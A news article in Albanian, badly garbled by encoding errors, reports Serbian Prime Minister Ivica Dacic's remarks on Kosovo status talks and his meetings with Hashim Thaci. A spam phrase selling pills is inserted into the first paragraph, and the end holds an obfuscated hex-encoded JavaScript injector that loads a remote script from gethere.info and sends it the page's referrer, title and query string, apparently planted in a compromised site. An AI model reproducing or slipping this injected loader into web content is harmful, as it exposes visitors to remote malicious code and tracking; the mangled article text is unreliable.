largea_ivica_dacic_bs-11353286747

“Po tA� takoheshim gjatA� luftA�s, do ta likuidoja ThaA�in, ose ai mua”

buy chlamydia pills online. Kryeministri i SerbisA�, Ivica daA�iq deklaroi sonte se Serbia nA� zgjidhjen e A�A�shtjes sA� KosovA�s (ai mendon nA� zgjidhje statusi), pA�r A�ka qenka e gatshme, ai nuk ka bashkA�bisedues nA� PrishtinA�, sepse a�?pA�rfaqA�suesit e saj nuk dA�shirojnA� tA� bisedojnA� pA�r kA�tA�, pasi mendojnA� se A�A�shtja e statusit A�shtA� e zgjidhura�?.

Sipas asaj qA� tha DaA�iq pA�r televizionin Pink, edhe kryeministri ThaA�i e ka tA� qartA� se A�A�shtja mund tA� zgjidhet vetA�m nA�se gjendet njA� zgjidhje e pranueshme edhe pA�r serbA�t.

a�?Jemi tA� gatshA�m tA� arrijmA� marrA�veshje qA� do tA� pA�rfillte interesat e serbA�ve dhe tA� shqiptarA�ve, porositi ai, i cili gjatA� komunikimit dy herA�sh me ThaA�in nA� Bruksel, takimet i karakterizoi si a�?shumA� mA� korrekte sesa qA� dikush ka pritura�?.
a�?Po ta kisha takuar ThaA�in gjatA� luftA�s, me siguri do ta likuidoja, ashtu sikundA�r edhe ai mua. Por, pasi ka ardhur koha e paqes, duhet tA� gjejmA� njA�farA� zgjidhjea�?, theksoi ai.

Pos tjerash, ai pA�rkujtoi se marrA�veshjen pA�r menaxhimin e integruar tA� kufijve, qA� do tA� fillojA� tA� zbatohet nga muaji dhjetor, e ka arritur ekipi i qeverisA� sA� mA�parshme dhe qA� A�shtA� realitet qA� ajo marrA�veshje duhet tA� zbatohet.
Ai shpjegoi se ky zbatim nuk do tA� sjellA� risi, pasi edhe deri tashti janA� kryer kontrolle nA� kalime drejt KosovA�s, por nA� tA� ardhshmen do tA� ekzistojA� vetA�m njA� punkt, kur rolin ekzekutiv do ta ketA� EULEX-i.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}